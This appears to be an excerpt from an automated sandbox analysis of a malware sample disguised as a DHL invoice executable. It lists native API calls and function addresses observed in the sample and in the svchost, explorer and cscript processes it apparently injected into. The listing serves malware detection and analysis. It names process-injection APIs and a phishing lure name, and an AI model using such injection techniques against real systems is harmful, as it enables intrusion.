Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038A042 NtQueryInformationProcess,	2_2_0038A042
Source: C:\Windows\explorer.exe	Code function: 3_2_0909EE12 NtProtectVirtualMemory,	3_2_0909EE12
Source: C:\Windows\explorer.exe	Code function: 3_2_0909D232 NtCreateFile,	3_2_0909D232
Source: C:\Windows\explorer.exe	Code function: 3_2_0909EE0A NtProtectVirtualMemory,	3_2_0909EE0A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020900C4 NtCreateFile,LdrInitializeThunk,	4_2_020900C4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020907AC NtCreateMutant,LdrInitializeThunk,	4_2_020907AC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FAB8 NtQueryValueKey,LdrInitializeThunk,	4_2_0208FAB8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	4_2_0208FAD0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FAE8 NtQueryInformationProcess,LdrInitializeThunk,	4_2_0208FAE8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FB50 NtCreateKey,LdrInitializeThunk,	4_2_0208FB50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FB68 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_0208FB68
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FBB8 NtQueryInformationToken,LdrInitializeThunk,	4_2_0208FBB8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208F900 NtReadFile,LdrInitializeThunk,	4_2_0208F900
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208F9F0 NtClose,LdrInitializeThunk,	4_2_0208F9F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	4_2_0208FED0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FFB4 NtCreateSection,LdrInitializeThunk,	4_2_0208FFB4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FC60 NtMapViewOfSection,LdrInitializeThunk,	4_2_0208FC60
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FD8C NtDelayExecution,LdrInitializeThunk,	4_2_0208FD8C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FDC0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_0208FDC0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02090048 NtProtectVirtualMemory,	4_2_02090048
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02090060 NtQuerySection,	4_2_02090060
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02090078 NtResumeThread,	4_2_02090078
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0209010C NtOpenDirectoryObject,	4_2_0209010C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020901D4 NtSetValueKey,	4_2_020901D4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02090C40 NtGetContextThread,	4_2_02090C40
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020910D0 NtOpenProcessToken,	4_2_020910D0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02091148 NtOpenThread,	4_2_02091148
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FA20 NtQueryInformationFile,	4_2_0208FA20
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FA50 NtEnumerateValueKey,	4_2_0208FA50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FBE8 NtQueryVirtualMemory,	4_2_0208FBE8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208F8CC NtWaitForSingleObject,	4_2_0208F8CC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208F938 NtWriteFile,	4_2_0208F938
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02091930 NtSetContextThread,	4_2_02091930
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FE24 NtWriteVirtualMemory,	4_2_0208FE24
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FEA0 NtReadVirtualMemory,	4_2_0208FEA0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FF34 NtQueueApcThread,	4_2_0208FF34
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FFFC NtCreateProcessEx,	4_2_0208FFFC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FC30 NtOpenProcess,	4_2_0208FC30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FC48 NtSetInformationFile,	4_2_0208FC48
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FC90 NtUnmapViewOfSection,	4_2_0208FC90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0208FD5C NtEnumerateKey,	4_2_0208FD5C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02091D80 NtSuspendThread,	4_2_02091D80
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009A350 NtCreateFile,	4_2_0009A350
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009A400 NtReadFile,	4_2_0009A400
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009A480 NtClose,	4_2_0009A480
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009A530 NtAllocateVirtualMemory,	4_2_0009A530
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009A47A NtClose,	4_2_0009A47A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005BA036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,	4_2_005BA036
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	4_2_005B9BAF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005BA042 NtQueryInformationProcess,	4_2_005BA042
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_005B9BB2

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012AD5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_012AD5EB

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012A1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_012A1201

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012AE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_012AE8F6

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01248060	0_2_01248060
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B2046	0_2_012B2046
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012A8298	0_2_012A8298
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0127E4FF	0_2_0127E4FF
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0127676B	0_2_0127676B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012D4873	0_2_012D4873
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0126CAA0	0_2_0126CAA0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0124CAF0	0_2_0124CAF0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01276DD9	0_2_01276DD9
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0125CC39	0_2_0125CC39
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0125B119	0_2_0125B119
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012491C0	0_2_012491C0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0125D065	0_2_0125D065
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01261394	0_2_01261394
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01261706	0_2_01261706
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01247920	0_2_01247920
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0125997D	0_2_0125997D
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012619B0	0_2_012619B0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0126781B	0_2_0126781B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01267A4A	0_2_01267A4A
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01261C77	0_2_01261C77
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01267CA7	0_2_01267CA7
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01261F32	0_2_01261F32
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012CBE44	0_2_012CBE44
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01279EEE	0_2_01279EEE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_001B35E0	0_2_001B35E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D88	2_2_00402D88
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041D593	2_2_0041D593
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00409E50	2_2_00409E50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041EE2E	2_2_0041EE2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0041E793	2_2_0041E793
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0073E0C6	2_2_0073E0C6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0073E2E9	2_2_0073E2E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0078A37B	2_2_0078A37B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00742305	2_2_00742305
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007663DB	2_2_007663DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007E63BF	2_2_007E63BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007C443E	2_2_007C443E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00786540	2_2_00786540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0075C5F0	2_2_0075C5F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007C05E3	2_2_007C05E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0078A634	2_2_0078A634
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007E2622	2_2_007E2622
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0074E6C1	2_2_0074E6C1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00744680	2_2_00744680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0074C7BC	2_2_0074C7BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0076286D	2_2_0076286D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0074C85C	2_2_0074C85C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0078C920	2_2_0078C920
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007D49F5	2_2_007D49F5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007569FE	2_2_007569FE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007429B2	2_2_007429B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007E098E	2_2_007E098E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007C6BCB	2_2_007C6BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007ECBA4	2_2_007ECBA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007CAC5E	2_2_007CAC5E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007E2C9C	2_2_007E2C9C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0074CD5B	2_2_0074CD5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00770D3B	2_2_00770D3B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0075EE4C	2_2_0075EE4C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00772E2F	2_2_00772E2F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00750F3F	2_2_00750F3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007B2FDC	2_2_007B2FDC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007DCFB1	2_2_007DCFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007BD06D	2_2_007BD06D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0075905A	2_2_0075905A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00743040	2_2_00743040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0076D005	2_2_0076D005
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007CD13F	2_2_007CD13F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007E1238	2_2_007E1238
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00747353	2_2_00747353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0073F3CF	2_2_0073F3CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0077D47D	2_2_0077D47D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00775485	2_2_00775485
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00751489	2_2_00751489
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0074351F	2_2_0074351F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007E35DA	2_2_007E35DA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007D771D	2_2_007D771D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007757C3	2_2_007757C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007C579A	2_2_007C579A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007DF8EE	2_2_007DF8EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007BF8C4	2_2_007BF8C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007C5955	2_2_007C5955
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007C394B	2_2_007C394B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007F3A83	2_2_007F3A83
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00767B00	2_2_00767B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0073FBD7	2_2_0073FBD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007CDBDA	2_2_007CDBDA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007DFDDD	2_2_007DFDDD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0076DF7C	2_2_0076DF7C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007CBF14	2_2_007CBF14
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038A036	2_2_0038A036
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00381082	2_2_00381082
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038B232	2_2_0038B232
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0038E5CD	2_2_0038E5CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00388912	2_2_00388912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00385B30	2_2_00385B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00385B32	2_2_00385B32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00382D02	2_2_00382D02
Source: C:\Windows\explorer.exe	Code function: 3_2_080E0036	3_2_080E0036
Source: C:\Windows\explorer.exe	Code function: 3_2_080D7082	3_2_080D7082
Source: C:\Windows\explorer.exe	Code function: 3_2_080D8D02	3_2_080D8D02
Source: C:\Windows\explorer.exe	Code function: 3_2_080DE912	3_2_080DE912
Source: C:\Windows\explorer.exe	Code function: 3_2_080E45CD	3_2_080E45CD
Source: C:\Windows\explorer.exe	Code function: 3_2_080E1232	3_2_080E1232
Source: C:\Windows\explorer.exe	Code function: 3_2_080DBB30	3_2_080DBB30
Source: C:\Windows\explorer.exe	Code function: 3_2_080DBB32	3_2_080DBB32
Source: C:\Windows\explorer.exe	Code function: 3_2_0909D232	3_2_0909D232
Source: C:\Windows\explorer.exe	Code function: 3_2_09094D02	3_2_09094D02
Source: C:\Windows\explorer.exe	Code function: 3_2_0909A912	3_2_0909A912
Source: C:\Windows\explorer.exe	Code function: 3_2_09097B30	3_2_09097B30
Source: C:\Windows\explorer.exe	Code function: 3_2_09097B32	3_2_09097B32
Source: C:\Windows\explorer.exe	Code function: 3_2_090A05CD	3_2_090A05CD
Source: C:\Windows\explorer.exe	Code function: 3_2_0909C036	3_2_0909C036
Source: C:\Windows\explorer.exe	Code function: 3_2_09093082	3_2_09093082
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0209E2E9	4_2_0209E2E9
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A2305	4_2_020A2305
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020EA37B	4_2_020EA37B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_021463BF	4_2_021463BF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020C63DB	4_2_020C63DB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0209E0C6	4_2_0209E0C6
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02142622	4_2_02142622
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020EA634	4_2_020EA634
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A4680	4_2_020A4680
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020AE6C1	4_2_020AE6C1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020AC7BC	4_2_020AC7BC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212443E	4_2_0212443E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020E6540	4_2_020E6540
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_021205E3	4_2_021205E3
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020BC5F0	4_2_020BC5F0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0214CBA4	4_2_0214CBA4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02126BCB	4_2_02126BCB
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020AC85C	4_2_020AC85C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020C286D	4_2_020C286D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020EC920	4_2_020EC920
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0214098E	4_2_0214098E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A29B2	4_2_020A29B2
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_021349F5	4_2_021349F5
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020B69FE	4_2_020B69FE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020D2E2F	4_2_020D2E2F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020BEE4C	4_2_020BEE4C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020B0F3F	4_2_020B0F3F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0213CFB1	4_2_0213CFB1
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02112FDC	4_2_02112FDC
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212AC5E	4_2_0212AC5E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02142C9C	4_2_02142C9C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020D0D3B	4_2_020D0D3B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020ACD5B	4_2_020ACD5B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02141238	4_2_02141238
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A7353	4_2_020A7353
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0209F3CF	4_2_0209F3CF
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020CD005	4_2_020CD005
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A3040	4_2_020A3040
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020B905A	4_2_020B905A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0211D06D	4_2_0211D06D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212D13F	4_2_0212D13F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0213771D	4_2_0213771D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212579A	4_2_0212579A
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020D57C3	4_2_020D57C3
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020DD47D	4_2_020DD47D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020B1489	4_2_020B1489
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020D5485	4_2_020D5485
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A351F	4_2_020A351F
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_021435DA	4_2_021435DA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02153A83	4_2_02153A83
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020C7B00	4_2_020C7B00
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212DBDA	4_2_0212DBDA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0209FBD7	4_2_0209FBD7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0211F8C4	4_2_0211F8C4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0213F8EE	4_2_0213F8EE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02125955	4_2_02125955
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212394B	4_2_0212394B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0212BF14	4_2_0212BF14
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020CDF7C	4_2_020CDF7C
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0213FDDD	4_2_0213FDDD
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009D593	4_2_0009D593
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009E793	4_2_0009E793
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00082D88	4_2_00082D88
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00082D90	4_2_00082D90
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009EE2E	4_2_0009EE2E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00089E50	4_2_00089E50
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00082FB0	4_2_00082FB0
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005BA036	4_2_005BA036
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B1082	4_2_005B1082
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B8912	4_2_005B8912
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005BB232	4_2_005BB232
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B5B32	4_2_005B5B32
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B5B30	4_2_005B5B30
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005B2D02	4_2_005B2D02
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_005BE5CD	4_2_005BE5CD

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: String function: 0125F9F2 appears 40 times
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: String function: 01260A30 appears 46 times
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: String function: 01249CB3 appears 31 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 007AF970 appears 84 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00783F92 appears 132 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0078373B appears 253 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0073E2A8 appears 60 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0073DF5C appears 137 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 020E3F92 appears 132 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0210F970 appears 84 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0209DF5C appears 137 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 020E373B appears 253 times
Source: C:\Windows\SysWOW64\cscript.exe	Code function: String function: 0209E2A8 appears 60 times

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.347661877.0000000002D20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000003.347542892.0000000002B0D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000002.348923807.0000000000A6B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesvchost.exej% vs COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

